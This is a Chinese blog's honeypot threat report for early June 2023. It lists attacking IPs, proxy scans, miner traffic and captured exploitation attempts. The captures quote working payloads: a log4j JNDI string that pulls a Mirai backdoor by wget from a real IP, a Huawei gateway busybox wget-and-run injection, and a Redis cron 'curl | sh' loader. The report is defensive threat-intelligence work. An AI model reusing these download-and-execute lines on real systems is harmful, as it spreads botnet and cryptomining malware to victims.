| 178.79.185.221  | beio          |    1 |
| 181.165.35.129  | User          |    1 |
| 198.54.130.56   | Administr     |    1 |
| 198.74.56.135   |               |    1 |
| 198.74.56.46    |               |    1 |
| 208.124.248.118 | User          |    1 |
| 211.53.3.10     | User          |    1 |
| 23.236.125.80   | Administrator |    1 |
| 23.248.175.138  | Administrator |    1 |
| 24.199.86.184   | beio          |    1 |
| 27.115.124.104  | Administrator |    1 |
| 27.115.124.113  | Administrator |    1 |
| 27.115.124.4    | Administrator |    1 |
| 27.115.124.48   | Administrator |    1 |
| 27.115.124.49   | Administrator |    1 |
| 27.115.124.68   | Administrator |    1 |
| 27.115.124.96   | Administrator |    1 |
| 27.115.124.97   | Administrator |    1 |
| 45.40.57.179    | Administrator |    1 |
| 45.40.57.56     | Administrator |    1 |
| 45.79.124.109   | Administrator |    1 |
| 47.243.6.177    | Administrator |    1 |
| 47.250.149.87   | Administrator |    1 |
| 47.250.57.72    | Administrator |    1 |
| 47.251.25.82    | Administrator |    1 |
| 47.253.47.153   | Administrator |    1 |
| 47.89.241.142   | Administrator |    1 |
| 58.72.240.34    | User          |    1 |
| 59.19.86.132    | User          |    1 |
| 64.227.137.10   | beio          |    1 |
| 64.227.142.101  | beio          |    1 |
| 68.183.33.189   | beio          |    1 |
| 69.164.217.74   |               |    1 |
| 69.4.234.17     | Administr     |    1 |
| 70.191.129.247  | User          |    1 |
| 75.129.81.62    | User          |    1 |
| 76.232.71.89    | User          |    1 |
| 8.208.20.114    | Administrator |    1 |
| 8.208.26.117    | Administrator |    1 |
| 8.208.80.181    | Administrator |    1 |
| 8.208.81.165    | Administrator |    1 |
| 8.209.104.126   | Administrator |    1 |
| 8.209.217.55    | Administrator |    1 |
| 8.209.218.156   | Administrator |    1 |
| 8.209.218.31    | Administrator |    1 |
| 8.209.240.183   | Administrator |    1 |
| 8.209.69.51     | Administrator |    1 |
| 8.209.98.117    | Administrator |    1 |
| 8.217.108.150   | Administrator |    1 |
| 8.218.160.92    | Administrator |    1 |
| 8.218.244.13    | Administrator |    1 |
| 80.110.22.245   | User          |    1 |
| 87.236.176.111  | elton         |    1 |
| 87.236.176.121  | elton         |    1 |
| 87.236.176.130  | elton         |    1 |
| 87.236.176.135  | elton         |    1 |
| 87.236.176.145  | elton         |    1 |
| 87.236.176.178  | elton         |    1 |
| 87.236.176.194  | elton         |    1 |
| 87.236.176.199  | elton         |    1 |
| 87.236.176.207  | elton         |    1 |
| 87.236.176.209  | elton         |    1 |
| 87.236.176.212  | elton         |    1 |
| 87.236.176.229  | elton         |    1 |
| 87.236.176.232  | elton         |    1 |
| 87.236.176.239  | elton         |    1 |
| 87.236.176.247  | elton         |    1 |
| 87.236.176.34   | elton         |    1 |
| 87.236.176.38   | elton         |    1 |
| 87.236.176.50   | elton         |    1 |
| 87.236.176.61   | elton         |    1 |
| 87.236.176.75   | elton         |    1 |
| 87.236.176.84   | elton         |    1 |
| 87.236.176.91   | elton         |    1 |
| 89.248.165.7    | Administr     |    1 |
| 96.85.163.125   | User          |    1 |

## 代理扫描

| ip              | 代理目标          | 次数 |
| ----------------- | ------------------- | ------ |
| 205.185.115.70  | www.baidu.com     |  152 |
| 198.98.53.107   | www.baidu.com     |  127 |
| 198.144.159.126 | cn.bing.com       |   79 |
| 199.195.248.153 | google.com        |   24 |
| 45.128.232.152  | google.com        |   19 |
| 109.207.200.43  | blank.org         |   11 |
| 162.240.237.185 | google.com        |   10 |
| 54.38.65.176    | www.bing.com      |   10 |
| 149.5.172.27    | google.com        |    8 |
| 193.35.18.54    | google.com        |    7 |
| 109.207.200.42  | blank.org         |    6 |
| 147.135.208.138 | www.bing.com      |    6 |
| 193.35.18.51    | google.com        |    6 |
| 45.83.23.218    | dnspod.qcloud.com |    6 |
| 51.75.65.136    | www.bing.com      |    6 |
| 95.211.95.26    | 104.244.42.70     |    6 |
| 103.116.52.251  | fast.com          |    5 |
| 194.87.151.139  | google.com        |    5 |
| 194.87.151.169  | google.com        |    5 |
| 45.128.232.141  | google.com        |    5 |
| 45.128.232.153  | google.com        |    5 |
| 45.135.232.6    | ipinfo.io         |    5 |
| 51.178.86.50    | www.bing.com      |    5 |
| 51.38.49.52     | www.bing.com      |    5 |

## 矿机通讯

| ip             | 特征字                                                                    | 次数 |
| ---------------- | ------------------------------------------------------------------------------ | ------ |
| 185.213.175.62 | {"id": 1, "method": "mining.subscribe",  "params": ["cpuminer/2.5.1"]} |    4 |
| 45.148.120.113 | {"id": 1, "method": "mining.subscribe",  "params": ["cpuminer/2.5.1"]} |    4 |
| 45.148.120.187 | {"id": 1, "method": "mining.subscribe",  "params": ["cpuminer/2.5.1"]} |    2 |

# 漏洞利用

## log4j

发起IP：95.214.53.99

特征字：`${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}`
URI：/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9zc2hrZXkyIDsgY3VybCAtTyBodHRwO
解析地址：
⚠：此地址下的文件属于linux后门文件，Backdoor/Linux.Mirai.ck，如果对于原理研究，可以考虑，切勿用于非法用途，也不要打开，否则后果自负。(把|改成/)
`wget http:||172.245.135.175|server|sshkey2 ; curl -O http`

## 华为家庭网关

发起IP：124.220.198.204
特征字：POST /ctrlt/DeviceUpgrade_1
特征字2：$(/bin/busybox wget -g 193.47.61.150 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)

## 疑似redis特征

发起IP：185.246.222.42
特征字：*3\r\n$3\r\nSET\r\n$3\r\nHA1\r\n$82\r\n\t\n*/10 * * * * echo Y3VybCAtZnNTTCBodHRwOi8vei5zaGF2c2wuY29tL2IK|base64 -d|sh|sh\n\t\r\n
⚠：此地址下的文件并未经过安全检测，并且很大概率是有害文件，如果对于原理研究，可以考虑，切勿用于非法用途，也不要打开，否则后果自负。(把|改成/)
解析地址A：http:||z.shavsl.com|b
解析地址B：http:||y.shavsl.com|gif

A地址下的文件为shell脚本，目的是下载B文件
文件存在ELF文件头，也存在upx压缩特征
经过UPX解压后反编译得到以下结论：

1. 关闭selinux
2. 创建ssh后门
3. 添加定时任务
4. 自我更新
5. md5校验
6. xmrig挖矿

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

zunmx.fans
我 www.hao123.com实名申请友链OωO
zunmx.fans
作者小小骗人，我登陆了也看不到( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
zunmx.fans
please many update 算法 (´இ皿இ｀)boke
zunmx.fans
df1/df2 df1+df2 转置，累加----*。。。...
zunmx.fans
为何无人评论？OωO

2023-06-14 蜜罐捕获风险报告

zmx • 2023 年 06 月 14 日

# 威胁报告

数据采样区间为`2023-06-02` - `2023-06-14`
采样数：55496
防火墙：启动
防火墙规则：（96条，包含C段）

+ Web 日志发现的异常请求
+ 蜜罐连续多天命中
+ 连续低频登陆失败蜜罐
+ 访问站点备份路径-非窗口期
+ 登陆服务器失败

> 登陆后可见内容为查询语句，报告中并非关键

# 大于200的捕获

<div class="hideContent">该部分仅登录用户可见</div>

# 协议

## 奇怪的扫描头

`MGLNDD`

## ssh 连接

<div class="hideContent">该部分仅登录用户可见</div>

---

<div class="hideContent">该部分仅登录用户可见</div>

## web get请求

<div class="hideContent">该部分仅登录用户可见</div>

---

### 网络扫描UA倒序

结论：

> 大多数使用的是自动化工具进行扫描，但是常规的浏览器UA也有可能是自动化工具伪造的，扫描最多的是境外的网络安全公司，这也不是个好现象。

## RDP4windows

<div class="hideContent">该部分仅登录用户可见</div>

## 代理扫描

## 矿机通讯

# 漏洞利用

## log4j

发起IP：95.214.53.99

## 华为家庭网关

发起IP：124.220.198.204
特征字：POST /ctrlt/DeviceUpgrade_1
特征字2：$(/bin/busybox wget -g 193.47.61.150 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)

## 疑似redis特征

A地址下的文件为shell脚本，目的是下载B文件
文件存在ELF文件头，也存在upx压缩特征
经过UPX解压后反编译得到以下结论：

1. 关闭selinux
2. 创建ssh后门
3. 添加定时任务
4. 自我更新
5. md5校验
6. xmrig挖矿

2023-06-14 蜜罐捕获风险报告

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

Typecho 插件开发 ZSecurity

个人空间使用规则[拟定] 23/3/9修订

企业微信-摸鱼必备，避免离开状态

基于Lively wallpaper的壁纸

中公教育CTS视频下载

Impala 中删除记录踩到的坑

低成本的居家办公舒适环境

回首当年，依稀岁月

nmcli 设置网卡信息

记录MySQL主从复制时报错以及解决方案

2023-06-14 蜜罐捕获风险报告

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

2023-06-14 蜜罐捕获风险报告

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。